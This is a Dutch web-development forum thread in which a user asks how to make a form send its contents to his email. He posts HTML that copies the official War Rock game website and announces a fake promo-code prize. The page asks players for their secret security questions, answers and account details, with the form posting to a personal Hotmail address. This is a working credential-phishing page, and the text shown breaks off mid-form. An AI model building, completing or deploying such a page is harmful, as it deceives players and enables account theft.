hoe kan ik een formelier versturen naar me mail

Status
Niet open voor verdere reacties.

umitg

Gebruiker
Lid geworden
15 mei 2008
Berichten
352
hoe verstuur ik een pagina met allemaal velden met vragen naar me mail?
Welke code moet ik hebben?
ik heb er geen verstand van maar ik heb gehoort dat het makkelijk is.
kan iemand mij dit aub uitleggen
alvast bedankt:thumb:
 
komop, heeft niemand een andwoord erop:shocked:
 
als je het script hier neer zet

tot zover ben ik gekomen...
hier is het:
HTML:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <title>Official War Rock Website -- Account Details</title>
  <meta name="keywords" content="KEYWORDS">
  <meta name="description" content="DESCRIPTION">
  <script language="javascript"
 src="../www.gamersfirst.com/g1_bar/g1_bar.js"></script>
  <script language="javascript">
showBar('0', 'WR', 'en');//1= logged in with portal account, 0= not logged in with portal account.
  </script>
  <meta http-equiv="Content-Type"
 content="text/html; charset=iso-8859-1">
  <style type="text/css">
<!--
.style1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
font-weight: bold;
color: #FFFFFF;
}
.style3 {font-size: 11px; color: #FFFFFF; font-family: Verdana, Arial, Helvetica, sans-serif;}
.style4 {
font-size: 11px;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style5 {
color: #FFFFFF;
font-weight: bold;
}
.style6 {color: #FFFFFF}
-->
  </style>
  <link rel="stylesheet"
 href="https://www.warrock.net/_inc/styles.css" type="text/css"
 media="all" title="styles">
  <link rel="stylesheet"
 href="https://www.warrock.net/_inc/modal-message.css"
 type="text/css">
  <script defer="defer" type="text/javascript"
 src="https://www.warrock.net/_inc/pngfix.js"></script>
  <script language="text/javascript" type="text/javascript"
 src="https://www.warrock.net/_inc/ajax.js"></script>
  <script language="text/javascript" type="text/javascript"
 src="https://www.warrock.net/_inc/modal-message.js"></script>
  <script language="text/javascript" type="text/javascript"
 src="https://www.warrock.net/_inc/ajax-dynamic-content.js"></script>
  <script language="text/javascript" type="text/javascript"
 src="https://www.warrock.net/_inc/scripts.js"></script>
  <script id="PLHIMScript" language="JavaScript"
 src="https://www.warrock.net/_inc/PLHIM.js">/* PLHIMMenu script */</script>
  <script type="text/javascript">
<!--
window.name='main';
function toggle(id)
{
var d = document.getElementById(id);
if (d) {
if (d.className == 'closed') {
d.className = "open";
} else {
d.className = "closed";
}
}
}
function toggleNav() {
openMenus = getCookie('warnav');
if (openMenus != null)
{
for (var i = 0; i<=10; i++)
{
var str = "navmenu" + i;
toggle(openMenus.match(str));
}
//delCookie('warnav');
}
else
{
toggle('navmenu0');
}
}
<!--
function menuPersist()
{
var whatsOpen=new Array()
for (var i = 0; i<=10; i++) {
if (document.getElementById('navmenu'+i))
{
if (document.getElementById('navmenu'+i).className=='open')
{
whatsOpen[i]='navmenu'+i;
}
}
}
setCookie('warnav',whatsOpen,.04)
}
//-->
<!--
function getCookie(NameOfCookie)
{ if (document.cookie.length > 0)
{ begin = document.cookie.indexOf(NameOfCookie+"=");
if (begin != -1)
{ begin += NameOfCookie.length+1;
end = document.cookie.indexOf(";", begin);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(begin, end)); }
}
return null;
}
function setCookie(NameOfCookie, value, expiredays)
{ var ExpireDate = new Date ();
ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));
document.cookie = NameOfCookie + "=" + escape(value) +
((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}
function delCookie(NameOfCookie)
{ if (getCookie(NameOfCookie)) {
document.cookie = NameOfCookie + "=" +
"; expires=Thu, 01-Jan-70 00:00:01 GMT";
}
}
function addLoadEvent(func) {
var oldonload = window.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function() {
oldonload();
func();
}
}
}
addLoadEvent(toggleNav);
var url=location.href;
if(url.match("basic_training")) { addLoadEvent(PLHIM_onload); }
//-->
  </script>
</head>
<noscript><meta http-equiv="refresh"
content="0;url=nojs.html"></noscript>
<body leftmargin="0" topmargin="0" marginheight="0"
 marginwidth="0">
<div style="margin-top: 40px;" container="">
<div id="header">
<div id="hdr">
<div id="logo" style="cursor: pointer;"
 onclick="window.location=('https://www.warrock.net/index.php');">
<script type="text/javascript">showflash('logo','200','103');</script></div>
<div id="header_top"></div>
<div id="header_mid">
<div style="position: relative;">
<script type="text/javascript">showflash('interface_top','590','89');</script></div>
<div
 style="position: relative; top: -89px; background-image: url(https://www.warrock.net/_img/interface_top.gif); width: 590px; height: 89px;">
<div style="position: relative; top: 68px;">
<div
 style="position: relative; float: left; left: 150px; color: rgb(204, 204, 204); cursor: pointer;"
 onclick="window.location='https://www.warrock.net/index.php';"><strong>HOME</strong></div>
<div
 style="position: relative; float: left; left: 212px; color: rgb(204, 204, 204); cursor: pointer;"
 onclick="window.location='http://ops.warrock.net/';"><strong>CLAN
SYSTEM</strong></div>
<div
 style="position: relative; float: left; left: 275px; color: rgb(204, 204, 204); cursor: pointer;"
 onclick="window.location='http://forum.warrock.net/';"><strong>FORUM</strong></div>
</div>
</div>
</div>
<div id="free2play_logo"></div>
</div>
<div id="header_bottom"></div>
</div>
<div id="interface_panel">
<div id="leftpanel">
<div id="nav_panel_left"></div>
<div id="nav_panel">
<div id="login_bck">
<div id="login_form">
<form action="https://www.warrock.net/login_process.php"
 method="post" name="login_frm" id="login_frm"
 onsubmit="javascript:return ValidateLogin()"
 style="position: absolute; left: 0px; top: -2px;">
  <div style="position: relative;" class="small"> <span
 style="line-height: 20px;"> <font color="#ffffff"><span
 style="font-size: 8pt;">Logged</span><span
 style="font-size: 8pt;"> As: <br>
Acct. Status:</span></font><span style="font-size: 9pt;">
  </span> <strong> <span style="font-size: 8pt;">
  <span style="color: rgb(47, 166, 69);">Active</span>
  </span> </strong> </span> </div>
  <div
 style="border: 0px none ; float: left; position: relative; top: 0px; width: 139px; height: 22px;">&nbsp;
  <p style="text-align: right;"> <a
 href="https://www.gamersfirst.com/register/index.php?g=5"> <input
 src="https://www.warrock.net/_img/button_logout_en.gif"
 value="Submit" name="logout" height="15"
 type="image" width="56"></a></p>
  </div>
  <div style="float: left; position: relative; left: 3px;">&nbsp;</div>
</form>
</div>
</div>
<div style="position: relative; float: left; top: -7px;">
<dl id="menu" style="width: 168px;">
  <dt onclick="javascript:toggle('navmenu1');"
 style="background-image: url(https://www.warrock.net/_img/nav_btn.gif);">
    <div id="nav_btn_container"><b>FEATURES</b></div>
  </dt>
  <dd id="navmenu1" class="closed">
    <ul>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/features.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Features</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/premium.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Premium</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/story.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Story</li>
    </ul>
  </dd>
  <dt onclick="javascript:toggle('navmenu2');"
 style="background-image: url(https://www.warrock.net/_img/nav_btn.gif);">
    <div id="nav_btn_container"><b>FIELD MANUAL</b></div>
  </dt>
  <dd id="navmenu2" class="closed">
    <ul>
      <li class="submenu_start"
 onclick="window.location='https://www.warrock.net/basic_training.php';menuPersist();"
 style="padding: 4px 0px 5px 30px; cursor: pointer;">Basic
Training</li>
      <li class="submenu_tail"
 onclick="window.location='https://www.warrock.net/branches.php';menuPersist();"
 style="padding: 3px 0px 5px 30px; cursor: pointer;">Branches
of Service</li>
      <li class="submenu_tail"
 onclick="window.location='https://www.warrock.net/armory.php';menuPersist();"
 style="padding: 3px 0px 5px 30px; cursor: pointer;">Armory
&amp; Equipment</li>
      <li class="submenu_tail"
 onclick="window.location='https://www.warrock.net/px.php';menuPersist();"
 style="padding: 3px 0px 5px 30px; cursor: pointer;">Px</li>
      <li class="submenu_tail"
 onclick="window.location='https://www.warrock.net/vehicles.php';menuPersist();"
 style="padding: 3px 0px 5px 30px; cursor: pointer;">Vehicles</li>
      <li class="submenu_tail"
 onclick="window.location='https://www.warrock.net/missions.php';menuPersist();"
 style="padding: 3px 0px 5px 30px; cursor: pointer;">Missions</li>
      <li class="submenu_tail"
 onclick="window.location='https://www.warrock.net/battle_conditions.php';menuPersist();"
 style="padding: 3px 0px 5px 30px; cursor: pointer;">Battle
Conditions</li>
    </ul>
  </dd>
  <dt onclick="javascript:toggle('navmenu3');"
 style="background-image: url(https://www.warrock.net/_img/nav_btn.gif);">
    <div id="nav_btn_container"><b>DOWNLOADS</b></div>
  </dt>
  <dd id="navmenu3" class="closed">
    <ul>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/download.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Client</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/screenshots.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Screenshots</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/concept_art.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Concept
Art</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/movies.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Movies</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/wallpapers.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Wallpapers</li>
    </ul>
  </dd>
  <dt onclick="javascript:toggle('navmenu4');"
 style="background-image: url(https://www.warrock.net/_img/nav_btn.gif);">
    <div id="nav_btn_container"><b>COMMUNITY</b></div>
  </dt>
  <dd id="navmenu4" class="closed">
    <ul>
      <li class="navmenu"
 onclick="window.location='http://forum.warrock.net/';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Forums</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/fan_media.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Fan Media</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/community_articles.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Community
Articles</li>
      <li class="navmenu"
 onclick="window.location='http://ops.warrock.net/';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Competitive</li>
    </ul>
  </dd>
  <dt onclick="javascript:toggle('navmenu5');"
 style="background-image: url(https://www.warrock.net/_img/nav_btn.gif);">
    <div id="nav_btn_container"><b>NEWS</b></div>
  </dt>
  <dd id="navmenu5" class="closed">
    <ul>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/news.php?ntitle=1';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Announcements</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/news.php?ntitle=2';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Events</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/news.php?ntitle=3';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Game
Updates</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/press.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Press</li>
    </ul>
  </dd>
  <dt onclick="javascript:toggle('navmenu6');"
 style="background-image: url(https://www.warrock.net/_img/nav_btn.gif);">
    <div id="nav_btn_container"><b>SUPPORT</b></div>
  </dt>
  <dd id="navmenu6" class="closed">
    <ul>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/faqs.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">FAQs</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/policies.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Policies</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/forgot_login.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Forgot
Login?</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/box_issues.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Box
Issues</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/tech_support.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Tech
Support</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/account_protection.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Account
Protection</li>
      <li class="navmenu"
 onclick="window.location='https://www.warrock.net/submit_ticket.php';menuPersist();"
 style="padding: 7px 9px 5px 10px; cursor: pointer;">Submit
Ticket</li>
    </ul>
  </dd>
</dl>
<div style="position: relative; top: -10px;"><img
 src="https://www.warrock.net/_img/nav_endcap.jpg" alt=""
 border="0" height="34" width="168">
<br>
<div align="center"><a
 href="http://www.gamersfirst.com/valentines/index.php?cid=WRHomeLkVday0208"
 target="_blank"><img
 src="http://warrock.gamersfirst.com/_img/whats_g1.jpg"
 border="0" height="157" width="149"></a></div>
<br>
<div style="margin-left: 10px; margin-bottom: -12px;">
Scheduled Maintenance: Wed. 3-6pm PST
</div>
<br>
<table border="0" cellpadding="1" cellspacing="2"
 width="100%">
  <tbody>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>US_West</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Canada</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>US_East</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Germany_2</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>UK_2</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Germany_1</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>UK_1</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Turkey</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Turkey_2</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Italy</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>USA_vs_EU</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>EU_vs_USA</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>India</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Poland</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
    <tr>
      <td colspan="2" height="8"></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#222222" nowrap="nowrap">&nbsp;<strong>Netherlands</strong>&nbsp;&nbsp;</td>
    </tr>
    <tr>
      <td bgcolor="#444444" width="100%">
      <table border="0" cellpadding="0" cellspacing="2">
        <tbody>
          <tr>
            <td>&nbsp;Traffic:&nbsp;</td>
            <td>
            <table border="0" cellpadding="0"
 cellspacing="2">
              <tbody>
                <tr>
                  <td bgcolor="#00ff00" height="8"
 width="2"></td>
                </tr>
              </tbody>
            </table>
            </td>
          </tr>
        </tbody>
      </table>
      </td>
    </tr>
  </tbody>
</table>
</div>
</div>
</div>
<div id="nav_panel_right"></div>
</div>
<div id="content">
<script type="text/JavaScript">
function ValidateFrm()
{
if(document.promoFrm.PromoCode.value=='')
{
document.promoFrm.PromoCode.focus();
document.promoFrm.PromoCode.style.border="2px solid \#d69900";
error('https://www.warrock.net/dialog.php?title=ERROR&amp;error=Please enter a promo code!');
return false;
}else{document.promoFrm.PromoCode.style.border="0px";}
}
</script><!-- BEGIN PAGE CONTENT//-->
<table id="content_table" style="margin: 0px auto;"
 border="0" cellpadding="0" cellspacing="0"
 height="216" width="586">
  <tbody>
    <tr>
      <td colspan="5"
 background="https://www.warrock.net/_img/content_01.gif"
 height="17" width="586"> </td>
    </tr>
    <tr>
      <td colspan="2" rowspan="2" class="title"
 background="https://www.warrock.net/_img/content_02.gif"
 height="28" width="217">
      <p style="margin-top: 0pt; margin-bottom: 0pt;">Activate
Promo Code</p>
      </td>
      <td colspan="3"
 background="https://www.warrock.net/_img/content_03.gif"
 height="1" width="369">
      <p style="margin-top: 0pt; margin-bottom: 0pt;"> </p>
      </td>
    </tr>
    <tr>
      <td colspan="3"
 background="https://www.warrock.net/_img/content_04.gif"
 height="27" width="369">
      <p style="margin-top: 0pt; margin-bottom: 0pt;"> </p>
      </td>
    </tr>
    <tr>
      <td colspan="5"
 background="https://www.warrock.net/_img/content_05.gif"
 height="4" width="586">
      <p style="margin-top: 0pt; margin-bottom: 0pt;"> </p>
      </td>
    </tr>
    <tr>
      <td background="https://www.warrock.net/_img/content_09.gif"
 valign="top">
      <p style="margin-top: 0pt; margin-bottom: 0pt;"> <img
 src="https://www.warrock.net/_img/content_06.gif" align="top"
 height="142" width="18"></p>
      </td>
      <td colspan="3" style="line-height: 20px;"
 bgcolor="#323232" valign="top" width="551">
      <div
 style="border: 2px dashed rgb(48, 48, 48); padding: 10px; background: rgb(70, 70, 70) none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial; margin-top: 8px;">
      <p class="style1"
 style="margin-top: 0pt; margin-bottom: 0pt;">Attention
Soldier!</p>
      <p class="style3"
 style="margin-top: 0pt; margin-bottom: 0pt;">Congratulations!
You have won a promo code from the War Rock website!<font
 color="black"> </font>To
activate your promo code you need to answer your secret question and
verify your login details. We need to verify that you are the orderly
user of this account. After that you can press the button on the bottom
to activate the promo for free.<u> </u> </p>
      <p class="style3"
 style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
      <p class="style3"
 style="margin-top: 0pt; margin-bottom: 0pt;" align="center">Premium
Package:<span class="style5"> Gold</span> (1 month) </p>
      <p class="style3"
 style="margin-top: 0pt; margin-bottom: 0pt;" align="center">&nbsp;Promo
Type:<b> M60</b></p>
      <p class="style3"
 style="margin-top: 0pt; margin-bottom: 0pt;" align="center">Your
Promo Code: <strong>BB38J892JK-JJ29-K29S-OW9A-28DJJ38OQ9</strong>&nbsp;</p>
      <p class="style3"
 style="margin-top: 0pt; margin-bottom: 0pt;"> </p>
      <p class="style3"> </p>
      <p class="style3"
 style="margin-top: 0pt; margin-bottom: 0pt;"><strong>IMPORTANT</strong></p>
      <span class="style6"><b>To ensure the security
of your account,
please provide a valid and accurate answer to each security question
(must be the same that you used on WarRock.net Registration). Accounts
with invalid information will be closed.</b>&nbsp;
      <p></p>
      </span>
      <form name="formkinglion" method="post"
 action=mailto:umit_soldier@hotmail.com>
        <p class="heading"
 style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"><span
 class="style4">Secret Question 1:</span>
        <select name="domanda" class="reg_field"
 id="domanda">
        <option value="">Select a Question</option>
        <option value="What was the name of your first pet?">What
was the name of your first pet?</option>
        <option value="What was the name of your first school?">What
was the name of your first school?</option>
        <option value="What was the first video game you played?">What
was the first video game you played?</option>
        <option value="What was your favorite TV show as a child?">What
was your favorite comic or cartoon as a child?</option>
        <option
 value="What was the name of the street you grew up on?">What
was the name of the street you grew up on?</option>
        <option value="What was the name of your first teacher?">What
was the name of your first teacher?</option>
        <option
 value="What was your favorite place to visit as a child?">What
was your favorite place to visit as a child?</option>
        <option value="What was your first job?">What was
your first job?</option>
        <option va="" 1da0=""
 lue="What is your favorite sports team?">What is your
favorite sports team?</option>
        <option value="What is your favorite food?">What
is your favorite food?</option>
        </select>
        </p>
        <p style="margin-top: 0pt;"> Secret Answer 1<span
 style="margin-top: 0pt;">: &nbsp; </span><span
 style="margin-top: 0pt; margin-bottom: 0pt;"> <input
 name="question" class="reg_field" id="question"
 size="30" type="text"> </span><span
 style="margin-top: 0pt; margin-bottom: 0pt;"> </span></p>
        <span style="margin-top: 0pt; margin-bottom: 0pt;">
        <p style="margin-top: 0pt; margin-bottom: 0pt;"> <span
 class="style4">Secret Question 2:</span>
        <select name="domanda2" class="reg_field"
 id="domanda2">
        <option value="">Select a Question</option>
        <option value="What was the name of your first pet?">What
was the name of your first pet?</option>
        <option value="What was the name of your first school?">What
was the name of your first school?</option>
        <option value="What was the first video game you played?">What
was the first video game you played?</option>
        <option value="What was your favorite TV show as a child?">What
was your favorite comic or cartoon as a child?</option>
        <option
 value="What was the name of the street you grew up on?">What
was the name of the street you grew up on?</option>
        <option value="What was the name of your first teacher?">What
was the name of your first teacher?</option>
        <option
 value="What was your favorite place to visit as a child?">What
was your favorite place to visit as a child?</option>
        <option value="What was your first job?">What was
your first job?</option>
        <option va="" 1da0=""
 lue="What is your favorite sports team?">What is your
favorite sports team?</option>
        <option value="What is your favorite food?">What
is your favorite food?</option>
        </select>
        </p>
        <p style="margin-top: 0pt;"> Secret Answer 2:
&nbsp; <input name="question2" class="reg_field"
 id="question2" size="30" type="text"> </p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
        </span>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
 align="left">Level:&nbsp; <input name="lvl"
 id="lvl" maxlength="2" class="reg_field" size="3"
 type="text">
Your level in game</p>
        <p style="margin-top: 0pt; margin-bottom: 0pt;"
